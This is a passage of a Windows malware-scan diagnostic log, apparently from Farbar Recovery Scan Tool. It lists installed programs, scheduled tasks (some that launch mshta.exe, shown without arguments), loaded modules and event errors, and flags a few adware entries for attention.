Hoyle Card Games (x32 Version: 2.2.0.95 - WildTangent) Hidden
HP Auto (Version: 1.0.12935.3667 - Hewlett-Packard Company) Hidden
HP Client Services (Version: 1.1.12938.3539 - Hewlett-Packard) Hidden
HP CoolSense (HKLM-x32\...\{11AF9A96-6D83-4C3B-8DCB-16EA2A358E3F}) (Version: 2.10.51 - Hewlett-Packard Company)
HP Customer Experience Enhancements (x32 Version: 6.0.1.8 - Hewlett-Packard) Hidden
HP Documentation (HKLM-x32\...\{00C14B63-9D12-4301-87AD-19D1D8E3C5D3}) (Version: 1.1.0.0 - Hewlett-Packard)
HP Games (HKLM-x32\...\WildTangent hp Master Uninstall) (Version: 1.0.2.5 - WildTangent)
HP Launch Box (HKLM\...\{BF1E75D0-E7AF-4BEA-9FBC-567F0C54BDF9}) (Version: 1.0.12 - Hewlett-Packard Company)
HP On Screen Display (HKLM-x32\...\{ED1BD69A-07E3-418C-91F1-D856582581BF}) (Version: 1.3.5 - Hewlett-Packard Company)
HP Power Manager (HKLM-x32\...\{7E799992-5DA0-4A1A-9443-B1836B063FEC}) (Version: 1.4.8 - Hewlett-Packard Company)
HP Quick Launch (HKLM-x32\...\{53B17A98-5BF0-40BC-AAFF-850A357975AC}) (Version: 2.7.2 - Hewlett-Packard Company)
HP Recovery Manager (x32 Version: 2.0.0 - Hewlett-Packard) Hidden
HP Security Assistant (HKLM\...\{288591DE-4151-4E8E-A698-C6EFF5DF00F9}) (Version: 2.0.1 - Hewlett-Packard)
HP Setup (HKLM-x32\...\{F5E7D9AF-60F6-4A30-87E3-4EA94D322CE1}) (Version: 9.0.15109.3899 - Hewlett-Packard Company)
HP Setup Manager (HKLM-x32\...\{AE856388-AFAD-4753-81DF-D96B19D0A17C}) (Version: 1.2.14901.3869 - Hewlett-Packard Company)
HP SimplePass PE 2012 (HKLM-x32\...\{423FBEB8-21C6-4720-A8DA-B19B06FDB607}) (Version: 5.3.1.7 - Hewlett-Packard)
HP Software Framework (HKLM-x32\...\{1DFA0C99-6E2E-46F4-B242-51C7CF41DDE5}) (Version: 4.5.12.1 - Hewlett-Packard Company)
HP Support Assistant (HKLM-x32\...\{EE202411-2C26-49E8-9784-1BC1DBF7DE96}) (Version: 7.0.39.15 - Hewlett-Packard Company)
IDT Audio (HKLM-x32\...\{E3A5A8AB-58F6-45FF-AFCB-C9AE18C05001}) (Version: 1.0.6368.0 - IDT)
Intel(R) Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1007 - Intel Corporation)
Intel(R) Identity Protection Technology 1.1.2.0 (HKLM-x32\...\{C01A86F5-56E7-101F-9BC9-E3F1025EB779}) (Version: 1.1.2.0 - Intel Corporation)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 7.0.0.1144 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2509 - Intel Corporation)
Intel(R) Rapid Start Technology (HKLM-x32\...\3D073343-CEEB-4ce7-85AC-A69A7631B5D6) (Version: 1.0.0.1008 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 10.6.2.1001 - Intel Corporation)
Internet Speed Tracker Internet Explorer Toolbar (HKLM-x32\...\InternetSpeedTracker_9tbar Uninstall Internet Explorer) (Version: - Mindspark Interactive Network) <==== ATTENTION
Java 7 Update 55 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217025FF}) (Version: 7.0.550 - Oracle)
Java Auto Updater (x32 Version: 2.1.9.8 - Sun Microsystems, Inc.) Hidden
Jewel Match 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden
Jewel Quest Mysteries: The Seventh Gate Collector's Edition (x32 Version: 2.2.0.98 - WildTangent) Hidden
John Deere Drive Green (x32 Version: 2.2.0.95 - WildTangent) Hidden
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Letters from Nowhere 2 (x32 Version: 2.2.0.97 - WildTangent) Hidden
Luxor HD (x32 Version: 2.2.0.98 - WildTangent) Hidden
Mah Jong Medley (x32 Version: 2.2.0.95 - WildTangent) Hidden
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (Version: 4.5.50938 - Microsoft Corporation) Hidden
Microsoft Application Error Reporting (Version: 12.0.6015.5000 - Microsoft Corporation) Hidden
Microsoft Office Access MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Access Setup Metadata MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Click-to-Run 2010 (HKLM-x32\...\Office14.Click2Run) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Click-to-Run 2010 (Version: 14.0.4763.1000 - Microsoft Corporation) Hidden
Microsoft Office Excel MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Home and Business 2010 (HKLM-x32\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Office Office 64-bit Components 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office OneNote MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Outlook MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (French) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (Spanish) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proofing (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Publisher MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared 64-bit MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared Setup Metadata MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Single Image 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Word MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30214.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
MSVCRT (x32 Version: 15.4.2862.0708 - Microsoft) Hidden
MSVCRT_amd64 (x32 Version: 15.4.2862.0708 - Microsoft) Hidden
MyFreeCodec (HKCU\...\MyFreeCodec) (Version: - )
Norton Internet Security (HKLM-x32\...\NIS) (Version: 21.3.0.12 - Symantec Corporation)
Norton Management (HKLM-x32\...\MCLIENT) (Version: 3.2.2.12 - Symantec Corporation)
opensource (x32 Version: 1.0.14960.3876 - Your Company Name) Hidden
Penguins! (x32 Version: 2.2.0.98 - WildTangent) Hidden
Plants vs. Zombies - Game of the Year (x32 Version: 2.2.0.98 - WildTangent) Hidden
PlayReady PC Runtime x86 (HKLM-x32\...\{CCA5EAAD-92F4-4B7A-B5EE-14294C66AB61}) (Version: 1.3.0 - Microsoft Corporation)
Poker Superstars III (x32 Version: 2.2.0.95 - WildTangent) Hidden
Polar Bowler (x32 Version: 2.2.0.97 - WildTangent) Hidden
Polar Golfer (x32 Version: 2.2.0.98 - WildTangent) Hidden
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.47.714.2011 - Realtek)
Realtek PCIE Card Reader (HKLM-x32\...\{C1594429-8296-4652-BF54-9DBE4932A44C}) (Version: 6.1.7601.85 - Realtek Semiconductor Corp.)
RollerCoaster Tycoon 3: Platinum (x32 Version: 2.2.0.98 - WildTangent) Hidden
Samsung Kies (HKLM-x32\...\InstallShield_{758C8301-2696-4855-AF45-534B1200980A}) (Version: 2.6.1.13105_6 - Samsung Electronics Co., Ltd.)
Samsung Kies (x32 Version: 2.6.1.13105_6 - Samsung Electronics Co., Ltd.) Hidden
SAMSUNG USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.29.0 - SAMSUNG Electronics Co., Ltd.)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version: - Microsoft)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (x32 Version: - Microsoft) Hidden
Skype Click to Call (HKLM-x32\...\{BB285C9F-C821-4770-8970-56C4AB52C87E}) (Version: 7.2.15747.10003 - Microsoft Corporation)
Skype 6.14 (HKLM-x32\...\{7A3C7E05-EE37-47D6-99E1-2EB05A3DA3F7}) (Version: 6.14.104 - Skype Technologies S.A.)
SMART BRO (HKLM-x32\...\{A9E5EDA7-2E6C-49E7-924B-A32B89C24A04}) (Version: 1.0.0.1 - ZTE)
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Synaptics ClickPad Driver (HKLM\...\SynTPDeinstKey) (Version: 15.3.29.0 - Synaptics Incorporated)
The Treasures of Mystery Island: The Ghost Ship (x32 Version: 2.2.0.98 - WildTangent) Hidden
Torchlight (x32 Version: 2.2.0.98 - WildTangent) Hidden
Update for Microsoft Access 2010 (KB2553446) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{B4A38370-2ADB-46B0-A1B0-0C4A2F7DCA31}) (Version: - Microsoft)
Update for Microsoft Filter Pack 2.0 (KB2878281) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.SingleImage_{302A8FE3-EBF5-486C-A431-16A1CD914443}) (Version: - Microsoft)
Update for Microsoft Filter Pack 2.0 (KB2878281) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{302A8FE3-EBF5-486C-A431-16A1CD914443}) (Version: - Microsoft)
Update for Microsoft InfoPath 2010 (KB2817369) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{4EEA3D3E-989C-4DF4-AB0A-3042C0C12AA3}) (Version: - Microsoft)
Update for Microsoft Office 2010 (KB2589298) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DADF7E25-FFA4-4D02-BE84-1DAE62C18516}) (Version: - Microsoft)
Update for Microsoft Office 2010 (KB2589352) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.SingleImage_{F4284D93-7AE8-4309-8CF3-9AD394F35F3A}) (Version: - Microsoft)
Update for Microsoft Office 2010 (KB2589352) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{F4284D93-7AE8-4309-8CF3-9AD394F35F3A}) (Version: - Microsoft)
Update for Microsoft Office 2010 (KB2589375) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{287A1E92-9E41-4BC1-8920-B3D0E9220800}) (Version: - Microsoft)
Update for Microsoft Office 2010 (KB2597087) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{9D69691D-823D-4C3E-9B12-563A3F520366}) (Version: - Microsoft)
Update for Microsoft Office 2010 (KB2760598) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.SingleImage_{ECFE33A3-B8B7-439A-ADE4-59FBD29EF9B8}) (Version: - Microsoft)
Update for Microsoft Office 2010 (KB2760598) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{ECFE33A3-B8B7-439A-ADE4-59FBD29EF9B8}) (Version: - Microsoft)
Update for Microsoft Office 2010 (KB2760631) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{35698CB7-AAA2-4577-B505-DBFF504AEF23}) (Version: - Microsoft)
Update for Microsoft Office 2010 (KB2794737) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{5AA578BB-759C-40FD-9661-A737C0884541}) (Version: - Microsoft)
Update for Microsoft Office 2010 (KB2825635) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{F1A20C69-9FE5-40FD-9CD5-84EABC2EF64A}) (Version: - Microsoft)
Update for Microsoft Office 2010 (KB2850079) 32-Bit Edition (HKLM-x32\...\{90140000-001F-040C-0000-0000000FF1CE}_Office14.SingleImage_{82F87E28-B18E-46D6-A399-E2F19CF5949B}) (Version: - Microsoft)
Update for Microsoft Office 2010 (KB2850079) 32-Bit Edition (HKLM-x32\...\{90140000-001F-0C0A-0000-0000000FF1CE}_Office14.SingleImage_{5E8EB600-8B94-429E-873E-98369C6DC1BC}) (Version: - Microsoft)
Update for Microsoft Office 2010 (KB2878225) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{EFF5EBA3-40AD-4859-85E7-3C1CF4F297EB}) (Version: - Microsoft)
Update for Microsoft OneNote 2010 (KB2837595) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.SingleImage_{51CCA922-A0CC-47C4-8910-6936D97CAC2E}) (Version: - Microsoft)
Update for Microsoft OneNote 2010 (KB2837595) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{51CCA922-A0CC-47C4-8910-6936D97CAC2E}) (Version: - Microsoft)
Update for Microsoft Outlook 2010 (KB2687567) 32-Bit Edition (HKLM-x32\...\{90140000-001A-0409-0000-0000000FF1CE}_Office14.SingleImage_{DCE104A1-1875-4469-A83D-A5BFA6C4640F}) (Version: - Microsoft)
Update for Microsoft Outlook 2010 (KB2687567) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{2AB483F1-C86E-427A-83B4-23889B03512D}) (Version: - Microsoft)
Update for Microsoft PowerPoint 2010 (KB2837579) 32-Bit Edition (HKLM-x32\...\{90140000-0018-0409-0000-0000000FF1CE}_Office14.SingleImage_{334AA0A1-2BB1-4D74-B66A-2B2C4D9C2C87}) (Version: - Microsoft)
Update for Microsoft PowerPoint 2010 (KB2837579) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{2BA40F82-F3A4-441C-BF1A-ED4C42FF4872}) (Version: - Microsoft)
Update for Microsoft SharePoint Workspace 2010 (KB2760601) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.SingleImage_{F9F5A080-AF38-4966-9A6B-C43DCA465035}) (Version: - Microsoft)
Update for Microsoft Visio 2010 (KB2880526) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{7B29D8B8-6A87-496C-A65E-B935E740448A}) (Version: - Microsoft)
Update for Microsoft Visio Viewer 2010 (KB2837587) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{38CF30E4-3348-4BD1-A859-B630C355A56F}) (Version: - Microsoft)
Update Installer for WildTangent Games App (x32 Version: - WildTangent) Hidden
VIP Access SDK (1.0.1.2) (HKLM-x32\...\VIP Access SDK) (Version: 1.0.1.2 - Symantec Inc.)
Virtual Villagers 4 - The Tree of Life (x32 Version: 2.2.0.98 - WildTangent) Hidden
VLC media player 2.1.3 (HKLM-x32\...\VLC media player) (Version: 2.1.3 - VideoLAN)
VpnOneClick (HKCU\...\6a4f81584d46feb3) (Version: 2.3.9.10 - VpnOneClick)
WildTangent Games App (HP Games) (x32 Version: 4.0.5.32 - WildTangent) Hidden
Windows Live Communications Platform (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3538.0513 - Microsoft Corporation)
Windows Live Essentials (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live ID Sign-in Assistant (Version: 7.250.4232.0 - Microsoft Corporation) Hidden
Windows Live Installer (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Language Selector (Version: 15.4.3538.0513 - Microsoft Corporation) Hidden
Windows Live Mail (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Mesh (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)
Windows Live Messenger (x32 Version: 15.4.3538.0513 - Microsoft Corporation) Hidden
Windows Live MIME IFilter (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Movie Maker (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Photo Common (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Photo Gallery (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live PIMT Platform (x32 Version: 15.4.3508.1109 - Microsoft Corporation) Hidden
Windows Live Remote Client (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Windows Live Remote Client Resources (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Windows Live Remote Service (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Windows Live Remote Service Resources (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Windows Live SOXE (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live SOXE Definitions (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live UX Platform (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live UX Platform Language Pack (x32 Version: 15.4.3508.1109 - Microsoft Corporation) Hidden
Windows Live Writer (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Writer Resources (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
WinZip 18.0 (HKLM\...\{CD95F661-A5C4-44F5-A6AA-ECDD91C240DF}) (Version: 18.0.10661 - WinZip Computing, S.L. )
Yahoo! Messenger (HKLM-x32\...\Yahoo! Messenger) (Version: - Yahoo! Inc.)
Yahoo! Software Update (HKLM-x32\...\Yahoo! Software Update) (Version: - )
Yahoo! Toolbar (HKLM-x32\...\Yahoo! Companion) (Version: - )
YouSendIt Plug-In for Outlook (x32 Version: - ) Hidden
YTD Video Downloader 4.8.1 (HKLM-x32\...\{1a413f37-ed88-4fec-9666-5c48dc4b7bb7}) (Version: 4.8.1 - GreenTree Applications SRL)
Zuma's Revenge (x32 Version: 2.2.0.98 - WildTangent) Hidden
==================== Restore Points =========================

==================== Hosts content: ==========================
2009-07-14 10:34 - 2009-06-11 05:00 - 00000824 ____N C:\Windows\system32\Drivers\etc\hosts
==================== Scheduled Tasks (whitelisted) =============
Task: {00D6719A-B2BC-4D31-8498-A765ADFBAC61} - System32\Tasks\DTChk => C:\Users\Public\Util\DTChk.exe [2014-05-20] (Search Results, LLC)
Task: {0D5F8DC5-7B10-44FE-BF06-5E6CB3BD3639} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2012-09-27] (Hewlett-Packard Company)
Task: {24A569F0-C89C-42EB-8A9B-ED2D095B6E8F} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Update Check => C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater7\HPSFUpdater.exe [2013-12-12] (Hewlett-Packard Company)
Task: {2D233B3A-9565-419E-BAA5-FC82DD7D73BA} - System32\Tasks\MirageAgent => C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe [2011-10-07] (CyberLink)
Task: {3F472961-8E96-4E06-AB15-D2875171A4B0} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2012-09-27] (Hewlett-Packard Company)
Task: {5C427928-2DBF-4DB6-BC4B-D81E18244C5D} - System32\Tasks\Norton Management\Norton Error Analyzer => C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\SymErr.exe [2012-10-19] (Symantec Corporation)
Task: {5D268E52-B1CA-4604-9F59-448A8349C952} - System32\Tasks\Microsoft\Windows\WindowsBackup\AutomaticBackup => Rundll32.exe /d sdengin2.dll,ExecuteScheduledBackup
Task: {5EB0EBB2-B4A4-42DE-8A40-DC3FC390D9A4} - System32\Tasks\{CA822321-983A-4340-9CB3-CB2EE057A063} => C:\Program Files (x86)\SMART BRO\UIMain.exe [2012-10-24] ()
Task: {6CCBD1A5-72D6-4F21-90F8-EC0CCE477AF9} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-11-25] (Google Inc.)
Task: {6D3585A5-7643-4399-8C31-001B06B882F6} - System32\Tasks\Norton Internet Security\Norton Error Analyzer => C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\SymErr.exe [2014-01-31] (Symantec Corporation)
Task: {72BA2474-1D02-4E42-8D7E-812D0F4E35B4} - \DTReg No Task File <==== ATTENTION
Task: {80FF5E38-29BA-41C6-9240-E3503A706ACE} - System32\Tasks\Norton WSC Integration => C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\WSCStub.exe [2014-05-11] (Symantec Corporation)
Task: {8E5081FD-C7AF-43EA-BB90-C7422385FE64} - System32\Tasks\Norton Internet Security\Norton Error Processor => C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\SymErr.exe [2014-01-31] (Symantec Corporation)
Task: {91741919-2D0D-413D-A95B-C1516057287A} - System32\Tasks\RegWrite => C:\Windows\system32\mshta.exe [2013-11-25] (Microsoft Corporation)
Task: {9524787C-EB4C-46E6-B4F3-6829050DE3A8} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Tuneup => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2012-09-27] (Hewlett-Packard Company)
Task: {967EC23D-B54A-4298-9611-D184AD06BA4B} - System32\Tasks\{EB48E1FA-5693-49CC-8BA6-47A279DDDC5E} => C:\Program Files (x86)\SMART BRO\UIMain.exe [2012-10-24] ()
Task: {A82378E6-04E3-4F38-BCA8-39F6BC165FD4} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-11-25] (Google Inc.)
Task: {B72BA812-3D71-42DC-B88C-23AC148870EB} - System32\Tasks\Norton Management\Norton Error Processor => C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\SymErr.exe [2012-10-19] (Symantec Corporation)
Task: {D24393E1-1107-439D-B478-4D19EB688728} - System32\Tasks\HPCeeScheduleForHewlett Packard => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2011-07-15] (Hewlett-Packard)
Task: {DFC2EB88-5E5C-424C-AAC9-D7BBE1774D96} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-05-25] (Adobe Systems Incorporated)
Task: {FB46FC93-DE80-4001-9037-B2BBF269182D} - System32\Tasks\SystemBoot => C:\Windows\system32\mshta.exe [2013-11-25] (Microsoft Corporation)
Task: {FB9404FE-77D7-4352-8C2A-32EECA95E013} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-05-20] (Piriform Ltd)
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\HPCeeScheduleForHewlett Packard.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe
==================== Loaded Modules (whitelisted) =============
2013-06-07 14:17 - 2012-10-24 14:38 - 00274760 _____ () C:\Program Files (x86)\SMART BRO\AssistantServices.exe
2011-09-01 19:13 - 2011-09-01 19:13 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
2011-10-01 02:40 - 2011-10-01 02:40 - 00107320 _____ () C:\Program Files\Hewlett-Packard\HP LaunchBox\HPTaskBar1.exe
2013-06-07 14:17 - 2012-05-11 09:41 - 00156448 _____ () C:\Program Files (x86)\SMART BRO\UIExec.exe
2014-04-15 03:41 - 2014-04-15 03:41 - 00039192 _____ () C:\Program Files\CCleaner\branding.dll
2014-05-25 07:12 - 2014-05-25 07:12 - 00041984 _____ () C:\Users\Hewlett Packard\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpcin9yk.dll
2013-10-19 07:55 - 2013-10-19 07:55 - 25100288 _____ () C:\Users\Hewlett Packard\AppData\Roaming\Dropbox\bin\libcef.dll
2014-05-24 14:02 - 2012-05-25 04:25 - 00921600 _____ () C:\Program Files (x86)\Yahoo!\Messenger\yui.dll
2014-02-14 15:13 - 2014-02-14 15:13 - 00172544 _____ () C:\Windows\assembly\NativeImages_v2.0.50727_32\IsdiInterop\db0cab2acf56035b3c1dfbb0a78a7dc7\IsdiInterop.ni.dll
2012-04-06 01:45 - 2011-08-24 12:37 - 00059904 _____ () C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IsdiInterop.dll
==================== Alternate Data Streams (whitelisted) =========
AlternateDataStreams: C:\3590F75ABA9E485486C100C1A9D4FF06Z...ZZ.ZZ....ZZZ:1
==================== Safe Mode (whitelisted) ===================

==================== EXE Association (whitelisted) =============

==================== Disabled items from MSCONFIG ==============

==================== Faulty Device Manager Devices =============

==================== Event log errors: =========================
Application errors:
==================
Error: (05/25/2014 07:12:00 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (05/25/2014 06:21:19 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (05/25/2014 06:21:13 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: DefaultTabSearch.exe, version: 0.0.0.0, time stamp: 0x52b3b87c
